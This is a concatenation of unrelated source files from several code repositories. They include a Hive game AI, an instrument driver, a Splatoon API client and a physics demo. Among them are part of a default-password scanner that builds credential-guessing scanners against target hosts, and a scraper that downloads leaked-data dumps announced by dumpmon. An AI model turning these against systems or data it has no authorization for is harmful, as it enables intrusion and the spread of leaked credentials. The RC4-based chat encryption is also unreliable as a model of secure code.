opts.passwds_path = dirname
# passwds affects categories, so passwds must be loaded first
opts.passwds = Passwd.load()
opts.targets = Target.parse(target)
opts.running = True
try:
TPCore.anyscan()
except KeyboardInterrupt as e:
opts.running = False
click.echo("Exit.")
sys.exit()
finally:
click.echo("\n--- Result -------------")
if not opts.result:
click.secho("[x] Not Found", fg="red")
else:
for msg in opts.result:
click.secho(msg, fg="green")
click.echo("------------------------\n")
if __name__ == "__main__":
main()
```
#### File: TotalPass/totalpass/target.py
```python
import os
import re
import sys
import copy
import logging
import socket
import click
from netaddr import IPNetwork
from netaddr.core import AddrFormatError
from .settings import opts
from . import addons
class Target(object):
"""
Scan target object; IP, port and category can differ between targets
"""
logger = logging.getLogger("TotalPass")
def __init__(self, host=None, port=None, category=None, protocol=None, url=None):
self.logger = Target.logger
self.host = host
port = port or opts.port
port = int(re.sub(r"\D", "", str(port))) if port else None
self.port = port if port and 0 < port < 65535 else None
self.category = category or protocol
self.protocol = protocol
self.url = url
def __eq__(self, other):
return self.__dict__ == other.__dict__
def __repr__(self):
s1 = "%s://" % self.protocol if self.protocol else ""
s2 = self.host or ""
s3 = ":%s" % self.port if self.port else ""
s = s1 + s2 + s3 if s2 else ""
return s
def alive(self) -> bool:
"""
Check whether the port is open
"""
if not self.port:
click.secho("[x] %s No port specified." % self.host, fg="red")
return False
addr = (self.host, int(self.port))
try:
# Check TCP
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(opts.timeout_alive)
s.connect(addr)
s.close()
click.secho("[+] [TCP] %s:%s is open." % (self.host, self.port), fg="green")
return True
except ConnectionRefusedError as e:
# Check UDP
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.settimeout(opts.timeout_alive)
s.connect(addr)
s.close()
click.secho("[+] [UDP] %s:%s is open." % (self.host, self.port), fg="green")
return True
except Exception as e:
click.secho("[x] %s:%s is close." % (self.host, self.port), fg="red")
self.logger.debug("%s Exception: %s" % (type(e).__name__, str(e)))
return False
def load_scanners(self) -> list:
"""
Load the matching scanners
"""
scanners = []
if self.category and self.category in addons.__all__:
addon = sys.modules.get("%s.addons.%s" % (__package__, self.category))
self.logger.info("Creating %s %s scanners..." % (self.category, self))
for passwd in opts.passwds:
if passwd.category != self.category and passwd.category != opts.common:
continue
for cred in passwd.credentials:
scanners.append(
addon.mkscanner(
passwd,
self,
cred.get("username", ""),
cred.get("password", ""),
)
)
else:
click.secho(
"[x] #%s %s is not yet supported." % (self.category, self), fg="red"
)
return scanners
@classmethod
def parse(cls, target) -> list:
"""
Parse target hosts and generate the target list
target may be a tuple/list/str or a file
"""
mid_targets = [] # intermediate results
ret_targets = [] # final results (with ports filled in)
if isinstance(target, str):
if os.path.isfile(target):
# TODO
pass
else:
mid_targets = cls._parse_str(target)
elif isinstance(target, tuple) or isinstance(target, list):
for t in target:
mid_targets += cls._parse_str(t)
# return mid_targets
# Fill in port and category for each target
for t in mid_targets:
if t.category:
t.port = t.port or opts.port or opts.port_map.get(t.category, 0)
ret_targets.append(t)
else:
for cat in opts.categories:
nt = copy.deepcopy(t)
nt.category = cat
nt.port = nt.port or opts.port or opts.port_map.get(cat, 0)
ret_targets.append(nt)
return ret_targets
@classmethod
def _parse_str(cls, target) -> list:
"""
Parse a target given as a string
"""
cls.logger.info("Parsing target %s" % target)
if not isinstance(target, str):
cls.logger.error("Target %s is not str" % target)
return []
target = target.strip().rstrip("/")
targets = []
try:
for ip in IPNetwork(target).iter_hosts(): # (covers IP or cidr) #3,4
targets.append(Target(host=str(ip)))
except AddrFormatError:
if len(target.split(":")) == 3:
# mysql://127.0.0.1:3306
protocol = target.split(":")[0]
host = target.split(":")[1].replace("//", "")
port = target.split(":")[2]
targets.append(Target(host=host, port=port, protocol=protocol))
elif "://" in target:
# snmp://127.0.0.1
protocol = target.split(":")[0]
host = target.split(":")[1].replace("//", "")
targets.append(Target(host=host, protocol=protocol))
elif ":" in target:
# 127.0.0.1:8080
host = target.split(":")[0]
port = target.split(":")[1]
targets.append(Target(host=host, port=port))
else:
targets.append(Target(host=target))
return targets
``` |
{
"source": "0xHornet/Physballs",
"score": 3
} |
#### File: Physballs/physballs/controls.py
```python
import pygame
import sys
import ball
import random
import graphics.render as render
from ball import Ball
# TODO: Make it so you can select, edit, delete planets
def check_event(running):
for event in pygame.event.get():
# Check for mouse input
if event.type == pygame.MOUSEBUTTONDOWN:
if event.button == 1:
# TODO: make sure to implement mouse pos here
ball.add_ball(pygame.mouse.get_pos(), random.randint(5, 80), render.rand_color())
if event.type == pygame.QUIT:
running = False
sys.exit()
``` |
{
"source": "0xhtml/software-challenge-2020",
"score": 3
} |
#### File: software-challenge-2020/socha/board.py
```python
from xml.etree import ElementTree
import csocha
class Board:
def __init__(self, fields: dict, obstructed: set):
self.fields = fields
self.obstructed = obstructed
self.cache = {}
def empty(self) -> frozenset:
if "empty" in self.cache:
return self.cache["empty"]
empty = frozenset(csocha.empty(self.fields))
self.cache["empty"] = empty
return empty
def nonempty(self) -> frozenset:
if "nonempty" in self.cache:
return self.cache["nonempty"]
nonempty = frozenset(csocha.nonempty(self.fields))
self.cache["nonempty"] = nonempty
return nonempty
def color(self, color: str) -> frozenset:
if "color" + color in self.cache:
return self.cache["color" + color]
positions = frozenset(csocha.color(self.fields, color))
self.cache["color" + color] = positions
return positions
def parse(xml: ElementTree.Element) -> Board:
fields = {}
obstructed = set()
for field in xml.findall("fields/field"):
x = int(field.get("x"))
y = int(field.get("y"))
if field.get("isObstructed") == "true":
obstructed.add((x, y))
else:
pieces = []
for piece in field:
pieces.append((piece.get("owner"), piece.get("type")))
fields[(x, y)] = pieces
return Board(fields, obstructed)
```
#### File: software-challenge-2020/socha/gamestate.py
```python
from xml.etree import ElementTree
import csocha
from . import board, moves
class GameState:
def __init__(self, c: str, t: int, b: board.Board, undep: list):
self.color = c
self.opponent = "BLUE" if c == "RED" else "RED"
self.turn = t
self.board = b
self.undeployed = undep
def is_connected(self, fields: set) -> bool:
visited = [fields.pop()]
while len(visited) > 0:
neighbours = fields.intersection(csocha.neighbours(visited.pop(0)))
fields.difference_update(neighbours)
visited.extend(neighbours)
return len(fields) == 0
def can_be_disconnected(self, piece: set) -> bool:
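# "One hive" check as implemented here: returns True when lifting this piece cannot split the hive.
# The neighbour-count test is a shortcut: with fewer than 2 or all 6 neighbours occupied, the rest stays connected.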
nonempty = self.board.nonempty()
if len(nonempty) == 1:
return True
neighbours = csocha.neighbours(piece)
length = len(nonempty.intersection(neighbours))
if length < 2 or length > 5:
return True
return self.is_connected(set(nonempty).difference({piece}))
def get_possible_moves(self) -> set:
# Get possible set moves
possible_moves = self.get_possible_set_moves()
# Add possible drag moves
possible_moves.update(self.get_possible_drag_moves())
# If no move is possible, add skip move
if len(possible_moves) == 0:
possible_moves.add(moves.SkipMove())
# Return possible moves
return possible_moves
def get_possible_set_moves(self) -> set:
# First turn
if self.turn == 0:
# All empty fields are possible
dests = self.board.empty()
# Second turn
elif self.turn == 1:
# Get first set piece
field = next(iter(self.board.color(self.opponent)))
# Get empty fields next to first piece
dests = self.board.empty().intersection(csocha.neighbours(field))
# All other turns
else:
# Get own pieces
dests = self.board.color(self.color)
# Get neighbours of own pieces
dests = {y for x in dests for y in csocha.neighbours(x)}
# Only empty fields
dests.intersection_update(self.board.empty())
# Get opponent pieces
opponent = self.board.color(self.opponent)
# Get neighbours of opponent pieces
opponent = {y for x in opponent for y in csocha.neighbours(x)}
# Only fields not next to opponent pieces
dests = dests.difference(opponent)
# If the bee hasn't been set by the fifth turn, the player has to set it
if (self.turn > 5 and (self.color, "BEE") in self.undeployed):
types = {"BEE"}
else:
types = {x[1] for x in self.undeployed if x[0] == self.color}
# Return all combinations of pieces and destinations
return {
moves.SetMove((self.color, y), x)
for x in dests
for y in types
}
def get_possible_drag_moves(self) -> set:
# Drag moves are only possible when bee is set
if (self.color, "BEE") in self.undeployed:
return set()
possible_moves = set()
# Loop through all set pieces
for position in self.board.color(self.color):
# When there is no piece under piece
if len(self.board.fields[position]) == 1:
if not self.can_be_disconnected(position):
continue
else:
# Piece is stacked therefore has to be a beetle
dests = self.get_beetle_move_dests(position)
# Call function to get piece type specific destinations
if self.board.fields[position][-1][1] == "BEETLE":
dests = self.get_beetle_move_dests(position)
elif self.board.fields[position][-1][1] == "BEE":
dests = self.get_bee_move_dests(position, position)
elif self.board.fields[position][-1][1] == "SPIDER":
dests = self.get_spider_move_dests(position)
elif self.board.fields[position][-1][1] == "ANT":
dests = self.get_ant_move_dests(position)
elif self.board.fields[position][-1][1] == "GRASSHOPPER":
dests = self.get_grasshopper_move_dests(position)
else:
continue
# Add all destinations to possible_moves
possible_moves.update(moves.DragMove(position, x) for x in dests)
# Return possible moves
return possible_moves
def get_beetle_move_dests(self, pos: tuple) -> set:
# Get neighbours of pos
all_neighbours = csocha.neighbours(pos)
# Only take fields with pieces
neighbours = set(self.board.nonempty().intersection(all_neighbours))
# If we are on top of another piece add it as well
if len(self.board.fields[pos]) > 1:
neighbours.add(pos)
# Get fields next to fields
dests = {y for x in neighbours for y in csocha.neighbours(x)}
# Only take fields in reach
dests.intersection_update(all_neighbours)
# Only take valid fields
dests.intersection_update(self.board.fields.keys())
# Return fields
return dests
def get_bee_move_dests(self, pos: tuple, start_pos: tuple) -> set:
# Get neighbours of pos
all_neighbours = csocha.neighbours(pos)
# Only take fields with pieces
neighbours = set(self.board.nonempty().intersection(all_neighbours))
# Remove own field
neighbours.discard(start_pos)
# Get fields next to fields
dests = set()
for neighbour in neighbours:
dests = dests.symmetric_difference(csocha.neighbours(neighbour))
# Get obstructed fields
obstructed = self.board.obstructed.copy()
# Only take obstructed fields in reach
obstructed.intersection_update(all_neighbours)
# Get fields next to obstructed fields
obstructed = (y for x in obstructed for y in csocha.neighbours(x))
# Remove fields next to obstructed
dests = dests.difference(obstructed)
# Only take fields in reach
dests.intersection_update(all_neighbours)
# Only take empty fields
dests.intersection_update(self.board.empty())
# Return fields
return dests
def get_spider_move_dests(self, pos: tuple) -> set:
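# Spider movement as implemented: exactly three bee-style steps outward, never revisiting a field,
# so only fields exactly three steps away are returned.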
dests = {pos}
all_dests = dests.copy()
for _ in range(3):
dests = {
y
for x in dests
for y in self.get_bee_move_dests(x, pos)
}.difference(all_dests)
all_dests.update(dests)
return dests
def get_ant_move_dests(self, pos: tuple) -> set:
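# Ant movement as implemented: flood fill of bee-style single steps; the ant may end on any
# reachable empty field except its own start field.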
found = set()
todo = {pos}
while len(todo) > 0:
dest = todo.pop()
found.add(dest)
dests = self.get_bee_move_dests(dest, pos).difference(found)
todo.update(dests)
found.discard(pos)
return found
def get_grasshopper_move_dests(self, pos: tuple) -> set:
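# Grasshopper movement as implemented: for each of the six hex directions, jump in a straight line
# over the adjacent pieces and land on the first empty field behind them; directions with no
# adjacent piece are skipped.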
dests = set()
for direction in [(1, 0), (1, -1), (0, -1), (-1, 0), (-1, 1), (0, 1)]:
dest = (pos[0] + direction[0], pos[1] + direction[1])
if dest in self.board.empty():
continue
while dest in self.board.nonempty():
dest = (dest[0] + direction[0], dest[1] + direction[1])
dests.add(dest)
dests.intersection_update(self.board.empty())
return dests
def get_bee(self, color: str) -> tuple:
# Loop through all fields
for position, pieces in self.board.fields.items():
# If bee is on this field return it
if len(pieces) > 0 and pieces[0] == (color, "BEE"):
return position
# Bee is not set yet, return None
return None
def game_ended(self):
# The end condition is only evaluated on RED's turn
if self.color != "RED":
return False
# Get empty fields for use later
empty = self.board.empty()
# Get own bee
ownbee = self.get_bee(self.color)
# If own bee is set
if ownbee is not None:
# If own bee has been surrounded, game has ended
if len(set(csocha.neighbours(ownbee)).difference(empty)) == 6:
return True
# Get opponent bee
oppbee = self.get_bee(self.opponent)
# If opponent bee is set
if oppbee is not None:
# If opponent bee has been surrounded, game has ended
if len(set(csocha.neighbours(oppbee)).difference(empty)) == 6:
return True
# If the turn limit is reached, the game has ended
return self.turn >= 60
def hash(self, depth: int) -> bytes:
if self.turn > 7 and self.turn < 60 - depth:
return csocha.hash(self.board.fields) + str(self.color).encode()
return csocha.hash(self.board.fields) + str(self.turn).encode()
def parse(xml: ElementTree.Element) -> GameState:
color = xml.get("currentPlayerColor")
turn = int(xml.get("turn"))
_board = board.parse(xml.find("board"))
undeployed = []
for piece in xml.findall("*/piece"):
undeployed.append((piece.get("owner"), piece.get("type")))
return GameState(color, turn, _board, undeployed)
``` |
{
"source": "0xhughes/dumpmon_tweeter_scraper",
"score": 3
} |
#### File: 0xhughes/dumpmon_tweeter_scraper/tweeter_scraper.py
```python
import urllib2
import time
import os
import datetime
import sys
from random import randint
def menu():
sane = 1
while sane == 1:
print "[ - ] Please enter absolute path to output directory: "
in_path = raw_input()+"\\tweeter_scraper_out"
if os.path.exists(in_path):
sane = 0
else:
try:
os.mkdir(in_path)
sane = 0
except:
os.system('cls' if os.name == 'nt' else 'clear')
print "[ - ] Invalid path, try again."
return(in_path)
def main(in_path):
print "[ + ] Gathering information..."
in_path = in_path
target_list = []
done_list = []
cnt = 0
while True:
if cnt != 0:
rand = randint(5,180)
print "[ - ] Sleeping "+str(rand)+" seconds until check for new items."
time.sleep(rand)
try:
resp = urllib2.urlopen("https://twitter.com/dumpmon")
except:
tmp_t = randint(360,720)
print "[ - ] Communication error, sleeping "+str(tmp_t)+" seconds before retrying..."
time.sleep(tmp_t)
continue
html = resp.readlines()
out_log = in_path+"\\out_log.txt"
out_log_fo = open(out_log, 'a+')
out_log_items = out_log_fo.readlines()
for done in out_log_items:
if done.strip() not in done_list:
done_list.append(done.strip())
for line in html:
if "data-expanded-url=" in line:
startCut = line.find('data-expanded-url=')+18
endCut = line[startCut:len(line)].find(' class=')+startCut
target = line[startCut+1:endCut-1]
target_list.append(target)
for targ in target_list:
if targ not in done_list:
try:
time.sleep(randint(1,15))
resp = urllib2.urlopen(targ)
except urllib2.HTTPError:
print "[ - ] Caught a 404, will try one more time in 2-4 minutes..."
time.sleep(randint(120,240))
try:
resp = urllib2.urlopen(targ)
except urllib2.HTTPError:
print "[ - ] 404, "+targ+", skipping, "+str(time.strftime("%m%d%y_%H%M%S"))
out_log_fo.write(targ+"\n")
continue
html = resp.read()
if html.strip() == "Please refresh the page to continue...":
page = "http://pastebin.com/"+targ[targ.rfind("=")+1:len(targ)]
print "[ - ] Attempting... "+page
resp = urllib2.urlopen(page)
html = resp.read()
start_raw_cut = html.find('<textarea id="paste_code" class="paste_code" name="paste_code" onkeydown="return catchTab(this,event)">')+103
end_raw_cut = html[start_raw_cut:len(html)].find('</textarea>')+start_raw_cut
html = html[start_raw_cut:end_raw_cut]
time_det = str(time.strftime("%m%d%y_%H%M%S"))
dump_file = in_path+"\\"+time_det+'.txt'
dump_file_fo = open(dump_file, 'w')
dump_file_fo.write(html)
dump_file_fo.close()
done_list.append(targ)
out_log_fo.write(targ+"\n")
print "[ + ] Dump "+targ+" grabbed @ "+str(time.strftime("%m%d%y_%H%M%S"))
out_log_fo.close()
cnt+=1
print "[ - ] Checked "+str(cnt)+" times."
out_log_fo.close()
try:
main(menu())
except KeyboardInterrupt:
print "[ - ] Interrupt caught, exiting."
sys.exit(0)
``` |
{
"source": "0xhunter213/python3_secure_chat",
"score": 3
} |
#### File: 0xhunter213/python3_secure_chat/message_client.py
```python
import socket
import sys
from rc4 import enc, dec
from rsa import *
from Crypto.Util.number import *
import threading
import os
from message_threads import *
def recieve_msg(conn, key):
while True:
msgRcv = conn.recv(1024)
if msgRcv != b'':
msg = dec(msgRcv.decode(), key)
print("SENDER:" + msg)
print(f'THIS is the enc: {msgRcv}')
if "quit" == msg or "exit" == msg:
exit(0)
def send_msg(conn, key):
while True:
data = input()
if data != '':
msg = enc(data, key)
print(msg)
conn.sendall(msg.encode())
print('ME: ', data)
if "quit" == data or "exit" == data:
exit(0)
if len(sys.argv) < 3:
print('[x] USAGE: message HOST PORT')
sys.exit(0)
host = sys.argv[1]
port = int(sys.argv[2])
e, n, d = key_gen(1024)
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((host, port))
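# Handshake as implemented below: send our RSA public key (e, n) with an 'INTZ' prefix, receive the
# RC4 session key encrypted to that key, decrypt it with the private exponent d, then acknowledge
# with an RC4-encrypted message.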
data = ('INTZ'+':'+str(e)+':'+str(n)).encode()
print(data)
client.sendall(data)
data = client.recv(1024)
msg = bytes_to_long(data)
key = long_to_bytes(pow(msg, d, n)).decode()
print(f'we recv this: {key}')
client.sendall(enc('we recv the key', key).encode())
data = client.recv(1024)
dec(data.decode(), key)
client.sendall(b'')
t1 = threading.Thread(target=send_msg, args=(client, key))
t2 = threading.Thread(target=recieve_msg, args=(client, key))
t1.start()
t2.start()
```
#### File: 0xhunter213/python3_secure_chat/rc4.py
```python
from binascii import hexlify
def key_init(key):
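# RC4 key-scheduling algorithm (KSA): build the identity permutation S and swap-mix it with the key bytes.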
s = []
for i in range(256):
s.append(i)
j = 0
for i in range(256):
j = (j + s[i] + ord(key[i % len(key)])) % 256
s[i], s[j] = s[j], s[i]
return s
def enc(msg, key):
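# RC4 PRGA: walk the permutation, emit one keystream byte per character and XOR it in;
# decryption (below) is the identical operation.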
s = key_init(key)
i = 0
j = 0
res = []
for c in msg:
i = (i + 1) % 256
j = (j + s[i]) % 256
s[i], s[j] = s[j], s[i]
oct_enc = s[(s[i]+s[j]) % 256]
res.append(chr(oct_enc ^ ord(c)))
return ''.join(res)
def dec(enc, key):
s = key_init(key)
i = 0
j = 0
res = []
for c in enc:
i = (i + 1) % 256
j = (j + s[i]) % 256
s[i], s[j] = s[j], s[i]
oct_enc = s[(s[i]+s[j]) % 256]
res.append(chr(oct_enc ^ ord(c)))
return ''.join(res)
def main():
while True:
msg = input("Enter a message:")
key = input("Enter a key:")
enc_msg = enc(msg, key)
print(f"Encrypted msg:{enc_msg}")
print(f"Encrypted msg in hex:{hexlify(enc_msg.encode()).decode()}")
dec_msg = dec(enc_msg, key)
print(f"Decrypted msg:{dec_msg}")
if __name__ == "__main__":
main()
``` |
{
"source": "0xicl33n/Splatnet2-Rich-Presence",
"score": 3
} |
#### File: 0xicl33n/Splatnet2-Rich-Presence/nso_functions.py
```python
import json
import requests
import time
import sys
import os
import socket
from config.logger import logger
def get_config_file():
'''Get the data from the config file, and create it if not present'''
try:
with open("config/config.txt") as config_f:
config_data = json.loads(config_f.read())
except FileNotFoundError:
config_to_write = {"api_key": "", "cookie": "", "friend_code": "",
"session_token": "skip", "user_lang": ""}
with open("config/config.txt", "w") as config_f:
config_f.write(json.dumps(config_to_write, indent=4))
config_data = get_config_file()
return config_data
def start_credential_proxy():
status_code = os.system(
"mitmdump -s ./config/get_session.py -q --set onboarding_host=setup.ink")
if bool(status_code):
sys.exit(1)
class NSOInterface:
def reload_config(self, config_data=None):
'''Reload the config, such as after the cookie has changed'''
if config_data is None:
config_data = get_config_file()
self.cookie = config_data['cookie']
return config_data
def __init__(self, config_data=None):
config_data = self.reload_config(config_data=config_data)
# only works with your game region's supported languages
USER_LANG = config_data["user_lang"]
if "app_timezone_offset" in config_data:
app_timezone_offset = str(config_data["app_timezone_offset"])
else:
app_timezone_offset = str(int(time.timezone/60))
if "app_unique_id" in config_data:
app_unique_id = str(config_data["app_unique_id"])
else:
# random 19-20 digit token. used for splatnet store
app_unique_id = "46674186337252616651"
if "app_user_agent" in config_data:
app_user_agent = str(config_data["app_user_agent"])
else:
app_user_agent = 'Mozilla/5.0 (Linux; Android 7.1.2; Pixel Build/NJH47D; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/59.0.3071.125 Mobile Safari/537.36'
self.app_head = {
'Host': 'app.splatoon2.nintendo.net',
'x-unique-id': app_unique_id,
'x-requested-with': 'XMLHttpRequest',
'x-timezone-offset': app_timezone_offset,
'User-Agent': app_user_agent,
'Accept': '*/*',
'Referer': 'https://app.splatoon2.nintendo.net/home',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': USER_LANG
}
def gen_new_cookie(self, reason):
'''Starts proxy to get new cookie from a user'''
logger.warn(
"Cookie invalid - reason: {} - loading proxy to regenerate".format(reason))
logger.info("In order to get a new token, we need to intercept it from the real NSO app. Please make sure you have a smartphone or Android emulator to continue.")
logger.info(
"If your smartphone runs Android 7.0 or higher, you will need to use an Android emulator or an iOS device to continue.")
start_credential_proxy()
def load_json(self, api_method):
'''Returns results JSON from online.'''
url = "https://app.splatoon2.nintendo.net/api/{}".format(api_method)
logger.debug("Pulling data from {}".format(url))
results_list = requests.get(
url, headers=self.app_head, cookies=dict(iksm_session=self.cookie))
results_data = json.loads(results_list.text)
try:
if results_data["code"] == "AUTHENTICATION_ERROR":
self.gen_new_cookie("auth")
# recursively call ourselves to try again
results_data = self.load_json(api_method)
except KeyError:
pass
return results_data
def load_results(self, calledby="", salmonrun=True):
'''Returns the data we need from the results JSON, if possible.
Params:
salmonrun - Set to false if you don't want to merge in salmonrun data'''
data = self.load_json("results")
results = data['results']
if salmonrun:
salmonrun_data = self.load_json("coop_results")
for coop_match in salmonrun_data['results']:
for x in range(0, len(results)):
pvp_match = results[x]
if pvp_match['start_time'] < coop_match['start_time']:
results.insert(x, coop_match)
break
return results
``` |
{
"source": "0xInfty/lantz-drivers",
"score": 2
} |
#### File: drivers/aeroflex/a2023a.py
```python
import enum
from lantz.core import Feat, Action, MessageBasedDriver
from lantz.core.mfeats import BoolFeat, QuantityFeat, QuantityDictFeat, EnumFeat
class A2023a(MessageBasedDriver):
"""Aeroflex Test Solutions 2023A 9 kHz to 1.2 GHz Signal Generator.
"""
DEFAULTS = {'ASRL': {'write_termination': '\n',
'read_termination': chr(256)}}
#: Carrier frequency.
frequency = QuantityFeat(('CFRQ?', ':CFRQ:VALUE {0:f};{_}'),
'CFRQ:VALUE {0:f}HZ', units='Hz')
#: RF amplitude.
amplitude = QuantityFeat(('RFLV?', ':RFLV:UNITS {_};TYPE {_};VALUE {0:f};INC {_};<status>'),
'RFLV:VALUE {0:f}V', units='V')
#: Offset amplitude.
offset = QuantityFeat(('RFLV:OFFS?', ':RFLV:OFFS:VALUE {0:f};{_}'),
'RFLV:OFFS:VALUE {0:f}', units='V')
#: Enable or disable the RF output
output_enabled = BoolFeat('OUTPUT?', 'OUTPUT:{}', 'ENABLED', 'DISABLED')
#: Phase offset
phase = QuantityFeat(('CFRQ?', ':CFRQ:VALUE {:f}; INC {_};MODE {_}'), 'CFRQ:PHASE {}', units='degree')
#: Get internal or external frequency standard.
class FREQUENCY_STANDARD(enum.Enum):
INT = 'INT'
EXT10DIR = 'EXT10DIR'
EXTIND = 'EXTIND'
EXT10IND = 'EXT10IND'
INT10OUT = 'INT10OUT'
#: Set RF output level max.
rflimit = QuantityFeat('RFLV:LIMIT?', 'RFLV:LIMIT {}')
def remote(self, value):
if value:
self.write('^A')
else:
self.write('^D')
@Action(units='ms')
def expose(self, exposure_time=1):
self.write('EXPOSE {}'.format(exposure_time))
@Feat(values={True: 'on', False: 'off'})
def time(self):
# TODO: ??
self.write('')
return self.read()
@time.setter
def time(self, value):
self.write("vlal ".format(value))
def local_lockout(self, value):
if value:
self.write('^R')
else:
self.write('^P')
def software_handshake(self, value):
if value:
self.write('^Q')
else:
self.write('^S')
if __name__ == '__main__':
import argparse
import lantz.log
parser = argparse.ArgumentParser(description='Test Aeroflex 2023A')
parser.add_argument('-i', '--interactive', action='store_true',
default=False, help='Show interactive GUI')
parser.add_argument('-p', '--port', type=str, default='17',
help='Serial port to connect to')
args = parser.parse_args()
lantz.log.log_to_socket(lantz.log.DEBUG)
with A2023a.from_serial_port(args.port) as inst:
if args.interactive:
from lantz.ui.app import start_test_app
start_test_app(inst)
else:
print(inst.idn)
inst.fstd = "EXT10DIR"
print(inst.fstd)
print(inst.frequency)
inst.frequency = 41.006
print(inst.amplitude)
inst.amplitude = -13
inst.phase=0
print(inst.phase)
inst.phase=30
print(inst.phase)
inst.phase=60
print(inst.phase)
```
#### File: drivers/agilent/ag81130a.py
```python
from lantz.messagebased import MessageBasedDriver
from lantz import Feat, DictFeat, Action
from collections import OrderedDict
#from lantz import Q_
import numpy as np
import socket
import warnings
class Ag81130A(MessageBasedDriver):
"""
Lantz driver for interfacing with Agilent 81130A pulse pattern generator.
Includes testing code, which should work out of the box assuming you give
it the correct GPIB address.
Author: <NAME>
Date: 12/6/2016
Version: 0.1
"""
DEFAULTS = {
'COMMON': {
'write_termination': '\n',
'read_termination': '\n',
}
}
ON_OFF_VALS = OrderedDict([
('on', 1),
('off', 0),
])
ARM_SOURCE_VALS = OrderedDict([
('immediate', 'IMM'),
('external', 'EXT'),
('manual', 'MAN')
])
TRIG_SOURCE_VALS = OrderedDict([
('immediate', 'IMM'),
('external', 'EXT'),
('internal', '1')
])
TRIG_MODE_VALS = OrderedDict([
('continuous', 'CONT'),
('start', 'STAR')
])
channels = range(1,3)
#channels = OrderedDict([
# ('1', 0),
# ('2', 1)
# ])
segments = range(1,5)
# some weird list comprehension variable scope thing here
chan_segs = [(x,y) for x in range(1,3) for y in range(1,5)]
@Feat()
def idn(self):
"""
Identifiies the instrument.
"""
return self.query('*IDN?')
@Action()
def reset(self):
"""
Resets the instrument to default settings. This is recommended by the
manual before programming it.
"""
return self.write('*RST')
@DictFeat(keys=channels, limits=(-4.0,4.0))
def volt_high(self, chan):
"""
Returns the voltage corresponding to HIGH for channel chan.
"""
return self.query('VOLT{}:HIGH?'.format(chan))
@volt_high.setter
def volt_high(self, chan, volts):
"""
Sets the voltage corresponding to HIGH for channel chan to volts.
"""
return self.write('VOLT{}:HIGH {}V'.format(chan, volts))
@DictFeat(keys=channels, limits=(-4.0,4.0))
def volt_low(self, chan):
"""
Returns the voltage corresponding to LOW for channel chan.
"""
return self.query('VOLT{}:LOW?'.format(chan))
@volt_low.setter
def volt_low(self, chan, volts):
"""
Sets the voltage corresponding to LOW for channel chan to volts.
"""
return self.write('VOLT{}:LOW {}V'.format(chan, volts))
@Feat(values=ON_OFF_VALS)
def display(self):
"""
Returns if display is on or off, (off enables faster programming).
"""
return int(self.query('DISP?'))
@display.setter
def display(self, on_off):
"""
Sets display to be on or off, (off enables faster programming).
"""
return self.write('DISP {}'.format(on_off))
@Feat(values=ON_OFF_VALS)
def pattern_mode(self):
"""
Returns whether or not pattern mode is enabled.
"""
return int(self.query('DIG:PATT?'))
@pattern_mode.setter
def pattern_mode(self, on_off):
"""
Sets pattern mode to be enabled or disabled.
"""
return self.write('DIG:PATT {}'.format(on_off))
@Feat(values=ARM_SOURCE_VALS)
def arm_source(self):
"""
Returns the source used for the arming signal for triggering the instrument.
Options are immediate (continuous mode), external trigger, and manually
triggered from the keypad.
"""
return self.query('ARM:SOUR?')
@arm_source.setter
def arm_source(self, source_channel):
"""
Sets the trigger signal to the source channel.
Options are immediate (continuous mode), external trigger, and manually
triggered from the keypad.
"""
return self.write('ARM:SOUR {}'.format(source_channel))
@Feat(values=TRIG_SOURCE_VALS)
def trigger_source(self):
"""
Returns the source of the pulse period trigger signal.
Options are immediate, internal, or external (CLK IN signal)
"""
return self.query('TRIG:SOUR?')
@trigger_source.setter
def trigger_source(self, trigger_source):
"""
Sets the source of the pulse period trigger signal.
Options are immediate, internal, or external (CLK IN signal)
"""
return self.write('TRIG:SOUR {}'.format(trigger_source))
@DictFeat(keys=segments, limits=(0, 65504, 1))
def dig_patt_length(self, seg_num):
"""
Returns the segment length in pattern bits.
"""
return int(self.query('DIG:PATT:SEGM{}:LENG?'.format(seg_num)))
@dig_patt_length.setter
def dig_patt_length(self, seg_num, length):
return self.write('DIG:PATT:SEGM{}:LENG {}'.format(seg_num, int(length)))
@DictFeat(keys=chan_segs, values={'data':'DATA', 'PRBS':'PRBS', 'high':'HIGH', 'low':'LOW'})
def dig_patt_type(self, chan_seg):
"""
Returns the segment type
"""
channel = chan_seg[0]
seg_num = chan_seg[1]
return self.query('DIG:PATT:SEGM{}:TYPE{}?'.format(seg_num, channel))
@dig_patt_type.setter
def dig_patt_type(self, chan_seg, patt_type):
channel = chan_seg[0]
seg_num = chan_seg[1]
return self.write('DIG:PATT:SEGM{}:TYPE{} {}'.format(seg_num, channel, patt_type))
@Feat(limits=(1e3,660e6))
def frequency(self):
"""
Gets the operating frequency of the device - this is what sets the timescale
of the pattern duration.
"""
return float(self.query('FREQ?'))
@frequency.setter
def frequency(self, Hz):
"""
Sets the internal PLL frequency to Hz.
"""
return self.write('FREQ {}'.format(Hz))
@DictFeat(keys=channels, values={'nrz':'NRZ', 'rz':'RZ', 'r1':'R1'})
def data_format(self, channel):
"""
Returns current data format for the given channel.
Options are:
- nrz (non-return to zero)
- rz (return to zero)
- r1 (?)
"""
return self.query('DIG:SIGN{}:FORM?'.format(channel))
@data_format.setter
def data_format(self, channel, data_format):
"""
Sets data format of the given channel to data_format.
Options are:
- nrz (non-return to zero)
- rz (return to zero)
- r1 (?)
"""
return self.write('DIG:SIGN{}:FORM {}'.format(channel, data_format))
@DictFeat(keys=channels, values=ON_OFF_VALS)
def output_on(self, channel):
"""
Queries the output of the specified channel.
"""
return int(self.query('OUTP{}?'.format(channel)))
@output_on.setter
def output_on(self, channel, state):
"""
Sets the output of the specified channel to state.
"""
return self.write('OUTP{} {}'.format(channel, state))
@DictFeat(keys=channels, values=ON_OFF_VALS)
def comp_output_on(self, channel):
"""
Queries the output of the specified channel.
"""
return int(self.query('OUTP{}:COMP ?'.format(channel)))
@comp_output_on.setter
def comp_output_on(self, channel, state):
"""
Sets the output of the specified channel to state.
"""
return self.write('OUTP{}:COMP {}'.format(channel, state))
@DictFeat(keys=chan_segs)
def segment_data(self, chan_seg):
"""
Returns the data from segment seg_num, channel chan
"""
channel = chan_seg[0]
seg_num = chan_seg[1]
result = self.query('DIG:PATT:SEGM{}:DATA{}?'.format(seg_num, channel))
